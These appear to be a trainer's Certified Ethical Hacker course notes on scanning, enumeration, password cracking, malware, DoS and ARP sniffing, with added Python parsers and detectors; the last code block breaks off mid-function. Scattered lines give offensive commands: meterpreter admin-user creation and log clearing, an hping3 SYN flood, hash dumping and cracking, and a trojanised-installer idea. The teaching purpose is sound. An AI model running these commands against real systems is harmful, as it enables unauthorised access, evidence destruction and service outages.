
Ec-Council

CEH v10
Certified Ethical Hacker v10
Level: Beginner
Certification which teaches you about basics of various security domains.
20 Modules. 40 Hours.
Aim: Knowledge
Validity : 3Years

ECSA
Ec-Council certified Security Analyst v10
Level : Intermediate
Penetration Testing.
Aim: Skill
Validity : 3Years

LPT-Master
Licensed Penetration Tester
Level : Advanced
Aim : Proficiency
Validity : 2Years

What CEH is not.

Penetration Testing
Vulnerability Assessment // it touches VA but does not go deep into it.
Defensive Security // CEH is offensive-oriented

What CEH actually is.

Beginner level training which teaches you the basics of 10 different security domains.
Teaches you what an attack / breach is, how it is done and why it is possible.

CEH v10
20 Modules

The first six modules cover the basics of security.

Modules 3 and 4 have no lab.

Exam: 125 MCQs (Multiple Choice Questions), 4 hours, passing score around 70% (~87 correct answers).


/////
My Way of Teaching.

Strictly No PPt's
Start Basics of Security.
More Lab
Notepad // for definitions and basic understanding
MS Paint / Google Drawings // for understanding the flow
Ec-Council's Ilabs, Courseware.
My Own lab Setup.

////////
Access Code : Will be shared to you from your Co-Ordinator
Note: Your Access code will take nearly 1 week to be generated

Aspen Portal URL : https://aspen.eccouncil.org/


// To Download your Courseware, and Certificates.
Validity : 1 Year
Ilabs URL: https://eccouncil.learnondemand.net/
// To Access your Ilabs
Validity : 6Months

Pre Req:
Basic understanding of networking:
IP, DNS, ARP, TCP, UDP, ports
Book: https://ontibaanaadi.blogspot.com/p/hacking-books.html

//////
Module 1

What is Hacking ....?

Accessing a protected resource without the authentication / authorization you are supposed to have is known as hacking.

Pillars of Security

Confidentiality (encryption) // data should not be visible to unauthorized people
Integrity (hashing) // data should not be tampered with
Availability (backups, proper security mechanisms) // data and services should stay reachable even under attack. Ex: DoS attacks target availability
Authenticity (1- or 2-factor authentication) // nothing should be accessible unless the user is authenticated
Non-Repudiation (logs) // a user cannot deny his activity; every major activity should be logged

Types Of Hackers///

Black Hat : hacker trying to HARM


White Hat : hacker trying to Protect
Pentester, Security Analyst
Gray Hat : hacker trying to do both.

Script Kiddies: just run ready-made tools, with no real knowledge of how the hacking works.


/////////

5 Phases of Hacking.

1. Information Gathering // collecting as much info as possible about your target. Roughly 70% of your time
   // nmap, masscan
2. Exploitation / Gaining Access // getting a (usually low-privileged) foothold
   // Core Impact, Metasploit
3. Privilege Escalation // elevating your access from lower privileges to higher privileges, Guest -> Admin
   // Metasploit post module: post/multi/recon/local_exploit_suggester
4. Creating Backdoor / Maintaining Access

5. Clearing Footprints / Clearing logs / Covering Tracks

Pre Exploitation / Information Gathering / Reconnaissance


Exploitation
Post Exploitation

Robber => Hacker

Money => Data

Bank => Computer / Server

Windows
Guest -> Standard User -> Administrator -> NT AUTHORITY\SYSTEM

Unix
Guest -> User -> Sudo User* -> Root
////////////////////////////////

Few Terminologies

Vulnerability : a loophole or weakness which exists in a computer, device, protocol, script, program etc.
Ex: a glass door
Exploit : the attack or breach carried out by utilizing a vulnerability
Ex: getting into the bank through the glass door
Payload : the code the exploit delivers and runs on the target once the vulnerability is triggered (a shell, a backdoor)
Ex: hammer, stone

Bot : a previously compromised machine with a backdoor set up by the hacker, remotely controllable (many bots = a botnet).

Doxing : publishing someone's private identifying information (usually found by hacking) on social networks or the internet.

Daisy Chaining : compromising one machine and using it as a stepping stone to the next: A -> B -> C -> ...

Zero Day Attack / vulnerability:

Example timeline (a paid game):
27-08-2019 officially released
28-08-2019 someone finds a vulnerability
29-08-2019 the vulnerability is reported to the vendor
03-09-2019 official patch released

Zero Day vulnerability : a vulnerability that is known, and possibly already being exploited, before the vendor has released an official patch. In the timeline above, everything between 28-08 and 03-09 is the zero-day window.
/////

Eternal Blue, Shadow Brokers, WannaCry ransomware (2017)

March 14: official patch (MS17-010) released by Microsoft
April: the Shadow Brokers leak the EternalBlue SMBv1 exploit
May: WannaCry spreads using EternalBlue against machines that had not applied the two-month-old patch.
////////////////////////////////////////
iLabs limitations:
iLabs is an isolated network with no internet connectivity.
You can never take any file into iLabs from your computer, nor vice versa.
You can only work with the tools and scenarios present in iLabs.
Server 2016 (Tools directory)

Server 2012 (Attacker Machine)


Windows 10 (Victim Machine) & (Attacker Machine)
Windows 8 (Victim Machine)

Kali Linux (Attacker Machine)


Ubuntu

Build Up your Own Practice Lab:


https://www.hackwithbkob.com/2017/04/your-not-alone-we-are-watching-you.html

//////

Module - 02

Information Gathering
-> Passive IG M2
-> Active IG M3,M4,M5

Agenda 08-09-2019
Passive IG
Active IG

Exploitation

-> Passive IG M2 // usually web-based targets; also the groundwork for Social Engineering attacks.

Most Common Targets: Websites, Devices Accessible through Internet

Note: Ilabs is not used for this Module

IP address
Web technologies used
Physical Address info (Not MAC Address)
Technologies used internally through Job portals
Whois //https://centralops.net/co/
History of web pages
DNS info //https://centralops.net/co/
Subdomains
Hidden files, etc.

Please install Addons: Netcraft, Wappalyzer, Cookie Quick Manager.

Some small test websites:


http://certifiedhacker.com/
http://testfire.net
http://test.vulnweb.com/
https://www.hackwithbkob.com/

Use Google's search engine to help you profile a target

Google Dorks
GHDB Google Hacking Database
site: // restrict the search to a given domain
intitle: // only pages whose title contains the given text
intext: // only pages whose body contains the given text
inurl: // only pages whose URL contains the given text

filetype: // only files of the given type (pdf, xls, ...), etc.

prefix a term with '-' to exclude it from the results


wipro.com , www.wipro.com

https://www.exploit-db.com/ // public archive of exploits and hacking scripts (also hosts the GHDB)

httrack // website copier: mirrors a site to disk for offline analysis

Shodan.io // search engine for internet-exposed devices and services (IoT, cameras, ICS)

Active Information Gathering

Scanning // Port Scanning


Enumeration // probing open services for the information they leak (users, shares, versions)
Vulnerability Scanning // identifying the vulnerabilities of the machine.

// Scanning // Port Scan

Logical Ports // non-physical ports used to communicate with another computer.

Ports connect your computer to another computer for a network activity.
65536 ports (0-65535) per protocol
Socket => IP:Port
127.0.0.1:8080 => traffic to port 8080 on the local machine

Protocols =>

TCP (Transmission Control Protocol, connection-oriented, 3-way handshake) & UDP (User Datagram Protocol, connectionless)

TCP flags:
SYN // Synchronize: initiates a connection (first packet of the handshake SYN, SYN/ACK, ACK)
ACK // Acknowledge: confirms that data (or a SYN/FIN) was received
RST // Reset: aborts the connection; a closed port answers a SYN with RST
FIN // Finish: initiates the orderly end of the communication
URG // Urgent: marks data as urgent (the urgent pointer field is valid)
PSH // Push: asks the receiver to hand the data to the application immediately instead of buffering it

https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers

1-1023 Well known / Reserved Ports // standardized for specific services
Ex: HTTP-80, FTP-21, SSH-22, SMTP-25, SMB-445, SNMP-161

1024-49151 Registered / Vendor Specific Ports
Ex: Microsoft RDP-3389, MySQL-3306, PostgreSQL-5432

49152-65535 Dynamic / Ephemeral Ports

192.168.1.0/24

/24 => 192.168.1.1 - 192.168.1.254 (254 hosts)
/16 => 192.168.0.1 - 192.168.255.254 (65,534 hosts)
/8  => 192.0.0.1 - 192.255.255.254 (16,777,214 hosts)

Practical Port Scanning

Identify whether the target machine is up or not
Identify open ports
Identify services running on those open ports
Identify the O.S running
Identify vulnerabilities * // not traditionally a port scanner's job, but nmap's NSE scripts can do it

nmap is the best known and most commonly used port scanner

EC-Council's iLabs setup

Windows 8                   10.10.10.8   victim (sometimes)
Windows 10                  10.10.10.10
Windows 2016                10.10.10.16  www.goodshopping.com / www.moviescope.com
Windows 2012                10.10.10.12
Kali Linux (2018, updated)  10.10.10.11  attacker machine
Ubuntu                      10.10.10.9

Android machine: not connected.


////////////////////////

My Labs Setup

Updated Kali Linux Attacker Machine

Windows 7 Victim

Some Vulnerable Linux Machine *


//
Pre Req, For Building your own Lab
i3 or i5 Processor
500(free) GB HDD,
8GB of RAM
Network Connection (Wifi or Ethernet Router)

https://www.hackwithbkob.com/2017/04/your-not-alone-we-are-watching-you.html
Kali Linux creds => user: root, pass: toor // default on Kali releases before 2020.1; newer images use kali / kali
//

Agenda
// Practical of Port Scanning

Cheat Sheet for linux Commands


https://www.hackwithbkob.com/2018/03/basic-linux-commands.html

Cheatsheet for Nmap commands


https://www.hackwithbkob.com/2018/04/nmap-cheatsheets.html

OS's For Hacker's


Kali Linux
Parrot Sec
Black Arch
Backbox
Samurai
/////////////////////////

A live host you are allowed to port scan:

http://scanme.nmap.org/
any machine on your own network
192.168.1.1-192.168.1.254

Assignments:...?
perform port Scanning on
windows 2012,
windows 8
kali linux
ubuntu

1.what ports are open


2.what are the services running on those machine.
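To answer the two assignment questions above without reading scan output by eye, here is an added example (not code from the original notes or from nmap) that parses nmap's grepable output (`-oG`) into structured results and expands a CIDR range into the target list. The sample scan text inside it is constructed by hand in the -oG format, modelled on the iLabs addresses; the hostnames, services and version banners are illustrative, not a capture.

```python
"""Parse nmap grepable (-oG) output and expand a CIDR target range.

Added example, not part of the original notes. SAMPLE_GREPABLE is a hand-
constructed scan in nmap's -oG line format modelled on the iLabs addresses
above; the hostnames, services and versions in it are illustrative."""
import ipaddress
from dataclasses import dataclass, field

# Constructed sample of `nmap -sV -oG - 10.10.10.0/24` output (not a real scan).
SAMPLE_GREPABLE = (
    "# Nmap 7.70 scan initiated as: nmap -sV -oG - 10.10.10.0/24\n"
    "Host: 10.10.10.16 (www.goodshopping.com)\tStatus: Up\n"
    "Host: 10.10.10.16 (www.goodshopping.com)\tPorts: "
    "80/open/tcp//http//Microsoft IIS httpd 10.0/, "
    "445/open/tcp//microsoft-ds//Windows Server 2016 microsoft-ds/, "
    "3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/"
    "\tIgnored State: closed (997)\n"
    "Host: 10.10.10.11 ()\tStatus: Up\n"
    "Host: 10.10.10.11 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian/"
    "\tIgnored State: closed (999)\n"
    "Host: 10.10.10.9 ()\tStatus: Up\n"
    "Host: 10.10.10.9 ()\tPorts: 22/filtered/tcp//ssh///, "
    "80/open/tcp//http//Apache httpd 2.4.29/\tIgnored State: closed (998)\n"
    "# Nmap done -- 256 IP addresses (3 hosts up) scanned\n"
)


@dataclass
class Port:
    number: int
    state: str       # open / closed / filtered
    proto: str       # tcp / udp
    service: str     # nmap's service name, e.g. http
    version: str     # -sV banner, empty if not probed


@dataclass
class Host:
    ip: str
    hostname: str
    status: str = "unknown"
    ports: list = field(default_factory=list)


def port_class(number: int) -> str:
    """IANA range the port falls in (the three ranges listed in the notes)."""
    if not 0 <= number <= 65535:
        raise ValueError(f"port out of range: {number}")
    if number <= 1023:
        return "well-known"
    if number <= 49151:
        return "registered"
    return "dynamic"


def parse_grepable(text: str) -> dict:
    """Return {ip: Host}. Each 'Host:' line is tab-separated 'Key: value'
    fields; Ports is a comma list of port/state/proto/owner/service/rpc/version/."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                        # '# Nmap ...' comment lines
        fields = line.split("\t")
        ip, _, rest = fields[0][len("Host: "):].partition(" ")
        host = hosts.setdefault(ip, Host(ip=ip, hostname=rest.strip("() ")))
        for f in fields[1:]:
            key, _, value = f.partition(": ")
            if key == "Status":
                host.status = value.strip()
            elif key == "Ports":
                for entry in value.split(", "):
                    parts = entry.strip().split("/")
                    if len(parts) < 7:
                        continue
                    num, state, proto, _owner, service, _rpc, version = parts[:7]
                    host.ports.append(Port(int(num), state, proto, service, version))
    return hosts


def open_ports(hosts: dict, ip: str) -> list:
    """Assignment question 1: which ports are open on this machine."""
    return sorted(p.number for p in hosts[ip].ports if p.state == "open")


def services(hosts: dict, ip: str) -> dict:
    """Assignment question 2: {port: (service, version)} for the open ports."""
    return {p.number: (p.service, p.version) for p in hosts[ip].ports if p.state == "open"}


def expand_targets(cidr: str) -> list:
    """Usable host addresses in a network, e.g. /24 -> .1 through .254."""
    net = ipaddress.ip_network(cidr, strict=False)   # 192.168.1.1/24 -> 192.168.1.0/24
    return [str(h) for h in net.hosts()]


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_GREPABLE)
    for ip, host in scan.items():
        print(f"{ip} ({host.hostname or '-'}) {host.status}")
        for num, (svc, ver) in services(scan, ip).items():
            print(f"  {num}/tcp {port_class(num):<10} {svc:<14} {ver}")
    print(len(expand_targets("192.168.1.0/24")), "hosts in 192.168.1.0/24")
```

Run a real scan with `nmap -sV -oG scan.gnmap 10.10.10.0/24` and pass the file contents to `parse_grepable`; the same functions then answer the assignment for every host at once.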

Agenda For 15-09-2019

4. Enumeration
5. Vulnerability Scanning
6. System Hacking
// Enumeration
Probe the open ports to get more info about the target.

445 (SMB) Server Message Block: shares, usernames, accurate O.S version
161,162 (SNMP) Simple Network Management Protocol: system info, installed programs, usernames, network info

139 (TCP), 137 (UDP) NetBIOS: system name


//

smbclient // lists and lets you browse publicly shared files without authentication.

=> smbclient // tool to probe the SMB port and get info

=> smbclient -L <target-ip> -N // list all shares enabled on the machine (-N: no password)
=> enum4linux -a <target-ip> // perform detailed enumeration on the target machine

=> nmap -p 445 <target-ip> --script=smb* // execute all SMB-based NSE scripts on the target
=> nmap -p 445 <target-ip> --script=smb-enum-* // enumeration scripts only
=> nmap -p 445 <target-ip> --script=smb-vuln-* // vulnerability checks only

=> nbtscan -r <ip-range> // get the NetBIOS system names of the entire network range

=> netdiscover // ARP-based host discovery on the local network

=> locate .nse | grep <service name> // find the NSE scripts available for a service

Vulnerability Scanning:

Look for loopholes or vulnerabilities on your target. Common classes of finding:

1. RCE (Remote Code Execution) // the attacker runs code of his choice on the target, remotely, usually without authentication
2. Command Execution // the attacker can run OS commands, limited to what the OS allows the compromised user
3. Arbitrary Code Execution // the attacker can run some code on the target; 1, 2 and 3 often look similar in scanner reports
4. DoS (Denial of Service)
5. Backdoor
6. Information disclosure (around 85% of findings)

Vulnerability identifiers

CVE (Common Vulnerabilities and Exposures): maintained by MITRE, one ID per public vulnerability
CWE (Common Weakness Enumeration): MITRE's catalogue of weakness types (SANS publishes the CWE Top 25 with them)
MS (Microsoft): the vendor's own bulletin numbers for its products, e.g. MS17-010
OSVDB (Open Source Vulnerability Database): independent database, shut down in 2016
NVD (National Vulnerability Database): NIST's database built on CVE, with CVSS scores

CVE-2014-6271 Shellshock, CVE-2017-0143 EternalBlue (MS17-010)

Infrastructure scanners      | Web scanners
Nessus (trial)*              | Burp Suite
Qualys Guard                 | AppSpider
Acunetix                     | IBM AppScan
Nexpose                      | Acunetix
OpenVAS (free)               | OWASP ZAP (free)

Exploitation frameworks:
Metasploit   community (free) / Pro (paid)
Core Impact  paid
Canvas       paid

After a vulnerability is reported, either a fix is available or it is not; in both cases confirm the finding first:

true positive   scanner says vulnerable, and it is
true negative   scanner says not vulnerable, and it is not
false negative  scanner says not vulnerable, but it is (missed)
false positive  scanner says vulnerable, but it is not (noise)

https://10.10.10.16:8834/ ilabs/
nessus creds: admin / password

MS17-010 / CVE 2017-0143 Eternal Blue

Black Box // no info about target, No Creds


White Box // All info about target, All creds including Admin and User
Gray Box // Partial info about target, Creds of low priv User

/////
6.System Hacking
1. Getting Access through Cracking System's Passwords
2. Getting Access through a RCE Vulnerability (MS17-010, CVE 2017-0143)
3. Getting Access through a Malware and a bit Social Engineering
A hash is a cryptographic function which maps any input to a fixed-length digest over a fixed charset (e.g. hex).
1. Same hash value for the same data, wherever it is calculated.
2. Hashes cannot be reversed; "cracking" means hashing guesses and comparing them with the captured digest.

Windows 7 computer in Dubai:   hello -> 12345tyu
Linux machine in China:        hello -> 12345tyu   (same input, same digest)


/////////////////
Practical Types of Password Cracking

Wordlist / Dictionary file // a text file consisting of possible passwords

#Dictionary Method Password Cracking // the list of possible passwords is fed to the tool; the chance of success depends on the wordlist.

#Bruteforce // try every combination of characters
Ex: the password might be 8 characters long, consisting of lowercase letters:
aaaaaaaa - zzzzzzzz

#Rainbow cracking / Rainbow table Cracking
Precompute a table of possible passwords and their respective hashes, then feed the captured hashes to a tool that looks them up in the table (fast, but defeated by salting).

//
1. Copy the hashes to your attacker machine // needs Admin / root on the target
2. Crack them with the respective hash cracker / password cracker tool.

// Every hacking activity has "dependencies" and "limitations".

// Kon-Boot // bootable CD image which lets you log in to Windows without the password (needs physical access; bypasses rather than cracks).

// Windows Password Recovery Disk //


P@$$w0rd

WINDOWS
Location: C:\Windows\System32\config\SAM (locked while Windows runs; dump it from the live system with pwdump or copy it offline)
Algorithm: NT hash (MD4 of the UTF-16LE password, unsalted); shown as "NTLM" in tool output

Unix:
Location: /etc/shadow
Algorithm: crypt(3) variants, identified by prefix: $6$ sha512crypt, $5$ sha256crypt, $1$ md5crypt; all salted

Tools to Crack windows Password


=> pwdump //used to dump password hashes
=> ophcrack // used to crack password hashes
=> winrtgen // used to generate rainbow tables for given boundary
=> rcrack // used to crack password hashes using pre computed rainbow tables..

A(1) hello 2345678-> 23456781


B(2) hello hxv jhc-> 23456782

Tools to Crack Linux Passwords


=> unshadow
=> john
Windows (unsalted):
user1: password -> 1234567890
user2: password -> 1234567890      // same password, same hash

Linux (salted):
user1: password + salt 35 (password35) -> flvdlxbbduf
user2: password + salt ab (passwordab) -> cdskbdbcbvu   // same password, different hashes

Appending a random string to the user's password before hashing is known as password salting; the random string is the salt, and it is stored alongside the hash.

User info:          /etc/passwd // readable by all users, writable only by root
User password hash: /etc/shadow // readable and writable only by root

Steps:
1. Copy both the passwd and shadow files (needs root on the target).
2. Combine them in the correct order (unshadow passwd shadow > merged.txt).
3. Run a password cracker with a suitable method (john --wordlist=<wordlist> merged.txt).
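An added example (not code from the original notes or from John the Ripper) that shows the two points above in working code: why two Windows users with the same password have the same hash while the Linux ones differ, why a precomputed table cracks the unsalted hash instantly but not the salted one, and how the passwd/shadow merge in step 2 works. sha256 stands in for the real algorithms (NT hash, crypt(3)) because the property does not depend on the algorithm; the wordlist, user records and passwd/shadow lines are constructed.

```python
"""Unsalted vs salted password hashes, and merging passwd/shadow for a cracker.

Added example, not from the original notes. sha256 stands in for the real
algorithms (Windows: unsalted NT hash, Linux: salted crypt(3) hashes); the
wordlist, user records and passwd/shadow excerpts are constructed."""
import hashlib
import secrets

WORDLIST = ["password", "123456", "letmein", "P@$$w0rd", "qwerty"]   # constructed

# Constructed /etc/passwd and /etc/shadow excerpts (the hash is a placeholder).
PASSWD = "root:x:0:0:root:/root:/bin/bash\nuser1:x:1001:1001::/home/user1:/bin/bash\n"
SHADOW = "root:*:18500:0:99999:7:::\nuser1:$6$Qz8sR1fL$placeholderhash:18500:0:99999:7:::\n"


def unsalted_hash(password: str) -> str:
    """Same input -> same digest on every machine (the Windows NT-hash situation)."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: str) -> str:
    """The salt is prepended before hashing; it is stored next to the hash, not secret."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


def new_salt() -> str:
    return secrets.token_hex(8)    # 64 random bits per user


def build_table(wordlist) -> dict:
    """Precomputed digest -> plaintext map: the idea behind rainbow tables."""
    return {unsalted_hash(w): w for w in wordlist}


def crack_with_table(table: dict, digest: str):
    return table.get(digest)       # one lookup per captured hash


def crack_salted(wordlist, salt: str, digest: str):
    """With a salt every candidate must be re-hashed per user (dictionary attack)."""
    for w in wordlist:
        if salted_hash(w, salt) == digest:
            return w
    return None


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """Merge passwd and shadow by username into 'user:hash:uid:...' lines, the
    way John's `unshadow` does, so the cracker sees user and hash together."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line:
            user, h = line.split(":")[:2]
            hashes[user] = h
    merged = []
    for line in passwd_text.splitlines():
        if line:
            f = line.split(":")
            f[1] = hashes.get(f[0], f[1])      # replace the 'x' placeholder
            merged.append(":".join(f))
    return merged


def demo(password: str = "P@$$w0rd") -> dict:
    # Windows-style: two users with the same password get identical hashes.
    win = {"user1": unsalted_hash(password), "user2": unsalted_hash(password)}
    # Linux-style: each user gets a fresh salt, so the hashes differ.
    salts = {"user1": new_salt(), "user2": new_salt()}
    lin = {u: salted_hash(password, s) for u, s in salts.items()}
    table = build_table(WORDLIST)
    return {
        "same_hash_windows": win["user1"] == win["user2"],
        "same_hash_linux": lin["user1"] == lin["user2"],
        "table_cracks_windows": crack_with_table(table, win["user1"]),
        "table_cracks_linux": crack_with_table(table, lin["user1"]),
        "dictionary_cracks_linux": crack_salted(WORDLIST, salts["user1"], lin["user1"]),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:<26} {v}")
    print("\n".join(unshadow(PASSWD, SHADOW)))
```

The salted hash is still cracked by the dictionary attack, only per user rather than once for everyone; salting buys time, it does not make a weak password safe.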
///////////////

Offensive = Red Team


Defensive = Blue Team

2. Getting Access through a RCE Vulnerability (MS17-010, CVE 2017-0143)

3. Getting Access through a Malware and a bit Social Engineering


1. Create a payload
2. Create a listener
3. Transfer the payload to the victim and get him to execute it using social engineering.

Sept-22 Agenda
Creating Backdoor.
Malware
Startup location = C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Creating a Backup User


//Command to create admin user in Meterpreter
run getgui -u <username> -p <password>
//command to start remote desktop connection from kali linux
rdesktop <victim_IP> -u <username> -p <password>

Clearing Footprints
Clearing User logs and over all system's logs

//Command to clear logs using meterpreter


clearev

//////////////////////////
Malware Threats

Malware is an application which causes harm to the computer or its user.

!!! Malware does no harm until it is executed // like a bomb that has not gone off yet

Trojan Horse: Malware + Legitimate Application = Resulting app that looks legitimate
(Troy story) msfvenom payload + TeamViewer installer = "TeamViewer"

VIRUS (the expansion "Vital Information Resource Under Siege" is a backronym) attaches itself to other programs and needs a host file to spread
Worm spreads itself across the network without user action
Spyware spies on the user: camera, mic, keystrokes etc.
Adware pops up ads and misleads the user towards other malware
Ransomware the hacker encrypts the data and asks for a ransom
Rootkit malware which hides itself from antivirus and monitoring tools
RAT Remote Access Trojan

Veil-Evasion // used to encrypt / obfuscate payloads so antivirus does not recognise them

WannaCry ransomware, Petya, NotPetya = 2017

/////////////////
Malware Analysis

Static analysis: disassemble the code without running it. Tools: OllyDbg, Immunity Debugger.

Dynamic analysis: run the malware in a controlled environment (isolated VM / sandbox) and observe the changes it makes on the computer.
Tools: Process Hacker, TCPView, Wireshark

////////////////////////////
Social Engineering. A low-tech way of hacking

It is the art of hacking someone not through a computer's vulnerability but through human vulnerability, by convincing people to do your work for you.

Phishing // fake webpage or e-mail which looks identical to the original
Vishing // fraudulent calls: bank, financial organisation, ATM, CVV, OTP
Smishing // fraudulent SMS: bank, financial organisation, ATM, CVV, OTP
Tailgating // following an authorised person through a physical access control

Books: The Art of Deception / The Art of Intrusion -> Kevin Mitnick

Kevin Mitnick => YouTube talks
////////////////////////////////

DoS Denial of Service:

An attack where the hacker freezes the target computer or makes it inaccessible to legitimate users, either through a DoS vulnerability or by flooding it with malicious packets.

A DoS attack gives the attacker none of the target's data; it is done to cause financial or reputational loss to the target company.

Connections per instance / sockets:
each client connection costs the server ~3 sec of work
the server can handle 500 users at a given time
1000 requests arrive from clients
=> 503 Service Unavailable for the ones that do not fit

DoS Denial of Service // 1 attacker to 1 server (1 x 1)
works when attacker{more bandwidth} > server{less}, e.g. 15 Mbps vs 10 Mbps;
against a 10 Gbps server one attacker is not enough

DDoS Distributed Denial of Service // many attackers (bots) to 1 server (many x 1)
1,000 bots x 10 Mbps = 10 Gbps, enough for that server; Mirai-style IoT botnets number in the hundreds of thousands of devices.
/////////////////////////////
Resource exhaustion: keep the CPU, memory or connection table busy for a long period.

Volume based
Ping of death // oversized / fragmented ICMP packets that the target mis-handles on reassembly

Command => ping <target-ip> -s <size of the packet> // Linux
-l <size> on Windows

// ICMP can be blocked on the servers, so this is mostly historical

Protocol based
SYN flood // continuously send only SYN packets to an open port and never complete the handshake, so half-open connections fill the server's table

Command => hping3 -S -p <port number> <target-ip> --flood


/////

Some common ways to defend against DoS attacks

1. Keep all your machines patched and up to date.
2. Sense abnormal traffic & blacklist the sources (rate limiting, SYN cookies).
3. Load balancer
4. Content Delivery Network (CDN) to absorb volumetric traffic
5. Black-hole routing // drop all traffic to the attacked address upstream

Time To Live (TTL) // hop limit of a packet: decremented by every router, discarded when it reaches 0

HOIC, LOIC // point-and-click tools to perform DoS on websites.
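Defence 2 above ("sensing the traffic & blacklisting") is the one you can actually write yourself. The following is an added example (not code from the original notes or from any firewall product) of the detection logic: a sliding-window count of SYNs per source, compared with the ACKs that should follow them, applied to a constructed packet stream with one flooder and several legitimate clients. The tuples stand in for what a sniffer or firewall log would supply; the window and threshold values are illustrative.

```python
"""Flag a SYN flood from per-packet records and decide what to blacklist.

Added example, not from the original notes. The packets are constructed
(timestamp, source IP, destination port, TCP flags) tuples standing in for a
sniffer or firewall log; the window and threshold values are illustrative."""
from collections import defaultdict, deque


class SynFloodDetector:
    """A legitimate client completes the handshake (SYN, then ACK after the
    server's SYN/ACK); a flooder sends SYNs and never answers, leaving
    half-open connections behind."""

    def __init__(self, window: float = 1.0, syn_threshold: int = 100):
        self.window = window
        self.syn_threshold = syn_threshold
        self.syns = defaultdict(deque)     # src -> timestamps of recent SYNs
        self.acks = defaultdict(deque)     # src -> timestamps of recent ACKs
        self.blacklist = set()

    def _trim(self, dq: deque, now: float) -> None:
        while dq and now - dq[0] > self.window:
            dq.popleft()

    def observe(self, ts: float, src: str, dport: int, flags: str):
        """Feed one client packet. Returns src the first time it trips the rule."""
        if src in self.blacklist:
            return None                    # already dropped at the edge
        if "S" in flags and "A" not in flags:
            self.syns[src].append(ts)
        elif "A" in flags:
            self.acks[src].append(ts)
        self._trim(self.syns[src], ts)
        self._trim(self.acks[src], ts)
        n_syn, n_ack = len(self.syns[src]), len(self.acks[src])
        # Many SYNs per window and almost none completed: that is the SYN-flood
        # signature, as opposed to a busy but honest client.
        if n_syn > self.syn_threshold and n_ack < 0.1 * n_syn:
            self.blacklist.add(src)
            return src
        return None


def run_detector(packets, **kwargs):
    """Replay packets in time order; returns (blacklist, list of alerts)."""
    det = SynFloodDetector(**kwargs)
    alerts = [a for a in (det.observe(*p) for p in sorted(packets)) if a]
    return det.blacklist, alerts


def synthetic_traffic() -> list:
    """Constructed: one flooder at 200 SYN/s for 10 s with no ACKs, plus 20
    legitimate clients that each complete a handshake."""
    pkts = [(i * 0.005, "203.0.113.50", 80, "S") for i in range(2000)]
    for i in range(20):
        ts, ip = i * 0.5, f"198.51.100.{i + 1}"
        pkts += [(ts, ip, 80, "S"), (ts + 0.05, ip, 80, "A")]
    return pkts


def busy_but_legit() -> list:
    """Constructed: a proxy opening 150 connections/s, every one completed."""
    pkts = []
    for i in range(150):
        pkts += [(i * 0.005, "192.0.2.7", 443, "S"), (i * 0.005 + 0.001, "192.0.2.7", 443, "A")]
    return pkts


if __name__ == "__main__":
    bl, alerts = run_detector(synthetic_traffic())
    print("blacklisted:", sorted(bl), "alerts:", len(alerts))
    print("busy legit flagged:", run_detector(busy_but_legit())[0])
```

The ACK comparison is what keeps the busy proxy off the blacklist; a pure per-source SYN counter would block it too. Against a distributed flood, where each bot stays under the threshold, per-source counting is not enough and the total half-open count (or SYN cookies on the server) is the signal instead.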

////////////////////////////////////
Sniffing
The attacker gets/finds/identifies what data was exchanged between two neighbouring computers on the same network.
LAN, network Layer 2

192.168.1.10
192.168.1.x
A & B

Limitations:
It is only possible on the LAN
It only reveals plaintext protocols
Passive Sniffing <HUB> // the attacker sits idle and watches the traffic that the hub repeats to every port
Active Sniffing <Switch> // the attacker reroutes the path between two victims through himself. Also known as a Man-in-the-Middle attack (MITM)

Promiscuous mode: the NIC hands every frame it sees to the sniffer, not just those addressed to it.

ARP Address Resolution Protocol // maps IP to MAC; ARP treats the latest info as the rightful info

ARP Poisoning // sending fake ARP replies to the victim so it maps the gateway's IP to the attacker's MAC

IP forwarding // the attacker forwards the intercepted traffic on to the real destination (A to D) so the victim notices nothing

DNS
Domain name to IP address.

ARP cache temporarily stores the MAC/IP table of the devices it has found

ARP believes the latest info is the truthful info

>> arp -a // ARP cache of your device

Not possible (no second victim on the LAN to sit between):
Mobile hotspot gateway
Kali Linux attacker

Possible:
Mobile hotspot gateway
Kali Linux attacker
Windows 7 victim

Wi-Fi router gateway
Mobile client
Kali Linux attacker

MITM
ARP Poisoning
IP forwarding

Limitations
only works on the LAN
can only read plaintext protocols

Plaintext   Encrypted
HTTP        HTTPS
FTP         FTPS / SFTP
Telnet      SSH

Attacker Kali Linux 10.10.10.11


Victim 1 Windows 10 10.10.10.10
Victim 2 www.moviescope.com/10.10.10.16

Tools:
Ettercap // to perform ARP poisoning & IP forwarding
Wireshark // to view the packets
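The defender's side of the ARP poisoning described above: because the OS cache trusts the latest reply, detection means remembering the first one instead. The following is an added example (not code from the original notes, Ettercap or Wireshark) that replays a constructed stream of ARP replies, first normal traffic and then an attacker claiming both the gateway's and the victim's IP, and reports the contradictions. All MAC and IP addresses are illustrative.

```python
"""Detect ARP cache poisoning from a stream of ARP replies.

Added example, not from the original notes. The replies are constructed
(IP, MAC) pairs standing in for what Wireshark (filter: arp) or repeated
`arp -a` runs would show on the LAN; all addresses are illustrative."""
from collections import defaultdict


class ArpWatch:
    """Unlike the OS cache, which trusts the latest reply, this keeps the first
    MAC seen per IP (plus static entries for hosts you know, like the gateway)
    and alerts whenever a reply contradicts it."""

    def __init__(self, static: dict = None):
        self.table = {ip: mac.lower() for ip, mac in (static or {}).items()}
        self.static = set(self.table)
        self.claims = defaultdict(set)     # mac -> every IP it has claimed
        self.alerts = []

    def observe(self, ip: str, mac: str) -> list:
        """Process one ARP reply 'ip is-at mac'; returns the new alerts it caused."""
        mac = mac.lower()
        new = []
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac                   # learn, like a cache would
        elif known != mac:
            kind = "static-mismatch" if ip in self.static else "ip-changed-mac"
            new.append((kind, ip, known, mac))
        if ip not in self.claims[mac]:
            self.claims[mac].add(ip)
            # One MAC answering for several IPs (gateway + victim) is the MITM shape.
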